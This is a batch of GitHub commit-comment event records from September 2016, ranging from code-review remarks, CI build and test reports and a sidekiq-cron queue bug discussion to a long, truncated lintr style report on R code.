{"id":"4601490242","type":"CommitCommentEvent","actor":{"login":"crosseyedjim0"},"repo":{"name":"crosseyedjim0/portfolio-project"},"payload":{"comment":{"id":19127606,"position":null,"line":null,"path":null,"commit_id":"c4dc79089fd3f69a6af55b6e38570b5b7f61ee21","created_at":"2016-09-22T10:01:29Z","updated_at":"2016-09-22T10:01:29Z","body":"I noticed that, when resizing the window, the text \"photographer\" would overlap the right column text for a bit before repositioning on top of the right column text.  I set the display of the left column to \"flex\" and used \"justify-content\" to \"flex-end\".  Now, as soon as it hits the size threshold the whole left column text will jump to the top of the right."}},"created_at":"2016-09-22T10:01:29Z"}
{"id":"4601491740","type":"CommitCommentEvent","actor":{"login":"2bj"},"repo":{"name":"dotzero/amocrm-php"},"payload":{"comment":{"id":19127612,"position":null,"line":null,"path":null,"commit_id":"072c025cf0c416a2441928d3dda7b7fdae410428","created_at":"2016-09-22T10:01:48Z","updated_at":"2016-09-22T10:01:48Z","body":"👍 "}},"created_at":"2016-09-22T10:01:48Z"}
{"id":"4601497250","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19127624,"position":null,"line":null,"path":null,"commit_id":"eff536c5239fdd16a6b96bdcdc7b6456a58c349d","created_at":"2016-09-22T10:02:57Z","updated_at":"2016-09-22T10:02:57Z","body":"128792325-Issue5803 (wfbuhl) - i386-Windows-7-VisualStudio-12: OK (2295 of 2330 tests passed, 534 test warnings)\n\n * 564 tests had: AUD diffs.\n * 119 tests had: ERR diffs.\n * 29 tests had: Table big diffs.\n * 184 tests had: EIO diffs.\n * 27 tests had: ESO small diffs.\n * 14 tests had: ESO big diffs.\n * 1 test had: SSZ small diffs.\n * 4 tests had: ZSZ big diffs.\n * 5 tests had: MTR big diffs.\n * 24 tests had: RDD diffs.\n * 14 tests had: MTR small diffs.\n * 2 tests had: MTD diffs.\n * 2 tests had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eff536c5239fdd16a6b96bdcdc7b6456a58c349d-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.5%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T10:02:57Z"}
{"id":"4601500423","type":"CommitCommentEvent","actor":{"login":"MelanieCLopez"},"repo":{"name":"Guadalauyians/Melanie-Collette-Lopez"},"payload":{"comment":{"id":19127631,"position":null,"line":null,"path":null,"commit_id":"276fe90ef25d6c2cbbf0378c11740e44a4d7c6d1","created_at":"2016-09-22T10:03:37Z","updated_at":"2016-09-22T10:03:37Z","body":"Please add to a repository"}},"created_at":"2016-09-22T10:03:37Z"}
{"id":"4601502365","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19127632,"position":null,"line":null,"path":null,"commit_id":"d2aab6f3fbccc973ba276fa251f44b95f559931d","created_at":"2016-09-22T10:04:03Z","updated_at":"2016-09-22T10:04:03Z","body":"Initial commit."}},"created_at":"2016-09-22T10:04:03Z"}
{"id":"4601503903","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127634,"position":null,"line":null,"path":null,"commit_id":"0acacce89af1339b7fd1b49729f4b4cdc0ed2574","created_at":"2016-09-22T10:04:22Z","updated_at":"2016-09-22T10:04:22Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1106](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13892&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T10:04:22Z"}
{"id":"4601509471","type":"CommitCommentEvent","actor":{"login":"MarcusTwist"},"repo":{"name":"xfunforx/XglyphiOS"},"payload":{"comment":{"id":19127644,"position":null,"line":null,"path":null,"commit_id":"bdf58092799d32aa53a57f5fb44612ba11339a96","created_at":"2016-09-22T10:05:33Z","updated_at":"2016-09-22T10:05:33Z","body":"Any chance of uploading a compiled .deb release?"}},"created_at":"2016-09-22T10:05:33Z"}
{"id":"4601510047","type":"CommitCommentEvent","actor":{"login":"mstaring"},"repo":{"name":"kaspermarstal/SuperElastix"},"payload":{"comment":{"id":19127646,"position":null,"line":null,"path":null,"commit_id":"42478b0cf10b2bf64e96b204a8cd507d5669a1d8","created_at":"2016-09-22T10:05:40Z","updated_at":"2016-09-22T10:05:40Z","body":"or should we call it \"superelastix\" ?"}},"created_at":"2016-09-22T10:05:40Z"}
{"id":"4601510721","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19127648,"position":null,"line":null,"path":null,"commit_id":"d9a751a4f07f3a9846b8e11ff9a0c227988b2a85","created_at":"2016-09-22T10:05:49Z","updated_at":"2016-09-22T10:05:49Z","body":"Initial commit."}},"created_at":"2016-09-22T10:05:49Z"}
{"id":"4601511454","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19127651,"position":null,"line":null,"path":null,"commit_id":"cae009f51d0f9329fbab73d1572141e4837e62b2","created_at":"2016-09-22T10:05:58Z","updated_at":"2016-09-22T10:05:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1105](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13889&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 7, passed: 215, ignored: 3 Build time: 00:07:38\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request after POST succeeds with updated device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.POST request with same deviceId fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request updates device.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request with same deviceName fails with conflict.: <no details avaliable>\n\norg.genivi.sota.device_registry.DeviceResourceSpec.PUT request with same deviceId fails with conflict.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T10:05:58Z"}
{"id":"4601518542","type":"CommitCommentEvent","actor":{"login":"dainoequinoziale"},"repo":{"name":"dainoequinoziale/dainoequinoziale.github.io"},"payload":{"comment":{"id":19127667,"position":null,"line":null,"path":null,"commit_id":"549062cec5f52bafda437a32b2775a158edb638e","created_at":"2016-09-22T10:07:16Z","updated_at":"2016-09-22T10:07:16Z","body":" _posts/2016-09-21-21-settembre.markdown \r\n"}},"created_at":"2016-09-22T10:07:16Z"}
{"id":"4601520607","type":"CommitCommentEvent","actor":{"login":"Junyulive"},"repo":{"name":"ondrejbartas/sidekiq-cron"},"payload":{"comment":{"id":19127672,"position":10,"line":61,"path":"lib/sidekiq/cron/job.rb","commit_id":"b0c22b4562375f86275c1476646380de4982de5a","created_at":"2016-09-22T10:07:41Z","updated_at":"2016-09-22T10:07:41Z","body":"Hi Alexander,\n\nI tried add more unit test cases, I haven’t found the problem that the\nenqueued job with wrong queue name.\n\n1. Are you use ActiveJob or just sidekiq worker?\n2. Have you set ‘default’ queue name inside the job worker?\n3. Are you use yml config?\n\nYou can simply test on your own console:\n\nschedule_file = \"config/schedule.yml\"\nif File.exists?(schedule_file) && Sidekiq.server?\n  Sidekiq::Cron::Job.load_from_hash YAML.load_file(schedule_file)end\n\nSidekiq::Cron::Job.all.first.enque!\n\n\nI did see the job goes to the right queue.\n\n\n\n\n-- \nSincerely\njosh.c\n\nFrom: Alexander Logvinov <notifications@github.com>\n<notifications@github.com>\nReply: ondrejbartas/sidekiq-cron\n<reply@reply.github.com>\n<reply@reply.github.com>\nDate: September 22, 2016 at 2:17:30 AM\nTo: ondrejbartas/sidekiq-cron <sidekiq-cron@noreply.github.com>\n<sidekiq-cron@noreply.github.com>\nCc: josh.c <junyu.live@gmail.com> <junyu.live@gmail.com>, Author\n<author@noreply.github.com> <author@noreply.github.com>\nSubject:  Re: [ondrejbartas/sidekiq-cron] Calling\nperform_later/perform_async for jobs (b0c22b4)\n\nHi! This breaks simple configuration:\n\nmain_loader:\ncron: '* * * * *'\nclass: 'Worker::FetchLoader'\nqueue: main\nargs:\ntype: main\n\ncomments_loader:\ncron: '* * * * *'\nclass: 'Worker::FetchLoader'\nqueue: comments\nargs:\ntype: comments\n\nNow Worker::FetchLoader always executes in the default queue.\n\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub\n<https://github.com/ondrejbartas/sidekiq-cron/commit/b0c22b4562375f86275c1476646380de4982de5a#commitcomment-19127124>,\nor mute the thread\n<https://github.com/notifications/unsubscribe-auth/ABDRiLhUrFbsf16xuc_1p5Hmv5ldCwrEks5qskeogaJpZM4KDrld>\n.\n"}},"created_at":"2016-09-22T10:07:41Z"}
{"id":"4601521280","type":"CommitCommentEvent","actor":{"login":"jakubnabrdalik"},"repo":{"name":"jakubnabrdalik/gitkurwa"},"payload":{"comment":{"id":19127673,"position":5,"line":55,"path":"configNSFW_PL","commit_id":"caf39d60b40dc271d55122ede512c33d60f27400","created_at":"2016-09-22T10:07:50Z","updated_at":"2016-09-22T10:07:50Z","body":"PRs improving the situation are very welcome :)"}},"created_at":"2016-09-22T10:07:50Z"}
{"id":"4601521915","type":"CommitCommentEvent","actor":{"login":"egov-systems"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":19127675,"position":117,"line":117,"path":"egov/egov-lcmsweb/src/main/java/org/egov/lcms/web/controller/reports/GenericSubReportController.java","commit_id":"96de9ce3e2108ca65965798a87b6b5306cb424c6","created_at":"2016-09-22T10:07:59Z","updated_at":"2016-09-22T10:07:59Z","body":"are you trying something with @ExceptionHandler(Exception.class)\r\n\r\n```\r\npublic @ResponseBody String getGenerivSubReportResult(@RequestParam final String aggregatedBy,\r\n +            @RequestParam final Integer caseCategory, @RequestParam final String standingCounsel,\r\n +            @RequestParam final String courtType, @RequestParam final Integer courtName,\r\n +            @RequestParam final String judgmentType, @RequestParam final Integer petitionType,\r\n +            @RequestParam final Integer caseStatus, @RequestParam final String officerIncharge,\r\n +            @RequestParam final Date fromDate, @RequestParam final Date toDate, final HttpServletRequest request,\r\n +            final HttpServletResponse response) throws IOException, ParseException {\r\n\r\n```\r\nanymore parameters ?   Use form binding model here i hope its your GenericSubReportResult"}},"created_at":"2016-09-22T10:07:59Z"}
{"id":"4601522473","type":"CommitCommentEvent","actor":{"login":"adriaanm"},"repo":{"name":"adriaanm/util"},"payload":{"comment":{"id":19127676,"position":null,"line":null,"path":null,"commit_id":"17625f46400dcc3b777168e47b8244f932372794","created_at":"2016-09-22T10:08:06Z","updated_at":"2016-09-22T10:08:06Z","body":"Thanks!\nOn Wed, Sep 21, 2016 at 01:08 Kevin Oliver <notifications@github.com> wrote:\n\n> @adriaanm <https://github.com/adriaanm> this got sorted out in twitter@\n> 90f2180\n> <https://github.com/twitter/util/commit/90f218014dfbd85bf3d7b91246dee98cfda01161>\n>\n> (got pointed here via twitter#174\n> <https://github.com/twitter/util/issues/174>)\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/adriaanm/util/commit/17625f46400dcc3b777168e47b8244f932372794#commitcomment-19105712>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFjy1wCurTewy04VHdNI6Of2FqNUOSqks5qsGd3gaJpZM4KCPSk>\n> .\n>\n"}},"created_at":"2016-09-22T10:08:06Z"}
{"id":"4601523225","type":"CommitCommentEvent","actor":{"login":"perchrh"},"repo":{"name":"google/ExoPlayer"},"payload":{"comment":{"id":19127680,"position":null,"line":null,"path":null,"commit_id":"42e10c762543b2bdcb5517ab5fdfd583a59a479d","created_at":"2016-09-22T10:08:15Z","updated_at":"2016-09-22T10:08:15Z","body":"I used release-v1 and the command line. Re-tested now with the same result, from a clean git clone. \r\n\r\nrelease-v2, however, hangs when dexing one of the jar files, after the mockito-core-1.9.5.jar is done, both with the new in-process dexing and the standalone process method. \r\nThe hang occurs with 2.1.3 and 2.2.0, and not with 2.1.2. \r\n\r\nIt would still be possible to upgrade Gradle and receive the profiled Gradle security fix by using plugin version plugin 2.1.2 and Gradle 2.14.1. "}},"created_at":"2016-09-22T10:08:15Z"}
{"id":"4601524166","type":"CommitCommentEvent","actor":{"login":"FrankFFFF"},"repo":{"name":"AndreiLux/ref-3.10"},"payload":{"comment":{"id":19127682,"position":null,"line":null,"path":null,"commit_id":"c68dd00b5a674e093187682a4764f10523b4fbcf","created_at":"2016-09-22T10:08:26Z","updated_at":"2016-09-22T10:08:26Z","body":"Hi Andrei,\r\nI'm currently working on 5433,\r\nand I noticed you set hmp_full_threshold to 575 on 5433, \r\nis this value specific to platform? \r\nIf yes, how did you get this value?\r\nThank you for your previous work on 5433, learned a lot.\r\n\r\nRegards"}},"created_at":"2016-09-22T10:08:26Z"}
{"id":"4601527563","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":19127688,"position":null,"line":null,"path":null,"commit_id":"248fdfcf7356f2c20ab1e6afd1e9f295d08331c7","created_at":"2016-09-22T10:09:10Z","updated_at":"2016-09-22T10:09:10Z","body":"Per the tag line above this is in 5.6.24 upwards."}},"created_at":"2016-09-22T10:09:10Z"}
{"id":"4601529112","type":"CommitCommentEvent","actor":{"login":"blixtra"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19127696,"position":87,"line":87,"path":"examples/plugins/http-requests/README.md","commit_id":"be2616ba260f4b5f94e93eabd85a699880129793","created_at":"2016-09-22T10:09:31Z","updated_at":"2016-09-22T10:09:31Z","body":"I would also split this into 2 sentences\r\n\r\nEach element contains the metrics data provided by the HTTP requests plugin (just one metric in the example).\r\nThe data may also contain many samples (just one in the example)."}},"created_at":"2016-09-22T10:09:31Z"}
{"id":"4601530720","type":"CommitCommentEvent","actor":{"login":"mamehaze"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":19127697,"position":null,"line":null,"path":null,"commit_id":"8ce8d4be7225db00d73a6a45ec4450a41c1fef82","created_at":"2016-09-22T10:09:54Z","updated_at":"2016-09-22T10:09:54Z","body":"\"unpopulated position for SP0256-AL\" quite likely just means the chip was salvaged for use on another board if the game uses it and in reality it should be there.\r\n\r\nalso, since there are IC positions, why not use them in the filenames for this clone?\r\n"}},"created_at":"2016-09-22T10:09:54Z"}
{"id":"4601535521","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19127701,"position":null,"line":null,"path":null,"commit_id":"da539506df6bb7f258c736ff46fb802332b1c54e","created_at":"2016-09-22T10:10:52Z","updated_at":"2016-09-22T10:10:52Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/Condition.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​evaluateCondLik <- function(v, theta_x, theta_y, alpha_x, alpha_y, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:13:6:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L13) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(cnt in 1:length(I_X)) {\n     ^\n```\n[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                ^\n```\n[R/Condition.R:23:49:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L23) *style:* **Trailing whitespace is superfluous.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) - \n                                                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L31) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcConditional <- function(v, model, Nx, Ny) {\n^~~~~~~~~~~~~~~\n```\n[R/Condition.R:45:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L45) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:49:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L49) *style:* **Trailing whitespace is superfluous.**\n```r\n​ \n^\n```\n[R/Condition.R:61:18:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L61) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:61:54:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L61) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:74:19:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L74) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_left_x  <- evaluateCondLik(eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:76:19:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L76) *style:* **Variable and function names should be all lowercase.**\n```r\n​ check_right_x <- evaluateCondLik(1 - eps, theta_x, theta_y,\n                  ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:81:16:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L81) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:89:16:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L89) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:97:15:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L114) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L114) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:114:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L114) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:119:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L119) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:124:54:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L124) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\") \n                                                     ^\n```\n[R/Condition.R:129:50:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L129) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\",\"\\n\")\n                                                 ^\n```\n[R/Condition.R:138:9:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L138) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:138:9:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L138) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:141:23:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L141) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:141:23:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L141) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:147:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:154:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L154) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:167:9:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L167) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:14:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:171:14:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L171) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L176) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L176) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L176) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:176:46:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L176) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L181) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:181:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L181) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:202:17:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L202) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:210:10:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L210) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:210:18:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:211:4:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:213:10:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L213) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​    x <- subplex(initVals, g)\n         ^~~~~~~\n```\n[R/Condition.R:213:18:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/Condition.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- subplex(initVals, g)\n                 ^~~~~~~~\n```\n[R/drawLocal.R:2:1:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty = matrix(0,nrow=size(x)[1],ncol=size(x)[2]);\n^\n```\n[R/drawLocal.R:2:2:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L2) *style:* **Use two spaces to indent, never tabs.**\n```r\n​ \tk1 <- unique( round( 10^seq( 0, log10(j - 1), len = 1000)))    \n ^\n```\n[R/drawLocal.R:2:12:](https://github.com/thijsjanzen/GUILDS/blob/da539506df6bb7f258c736ff46fb802332b1c54e/R/drawLocal.R#L2) *style:* **Put spaces around all infix 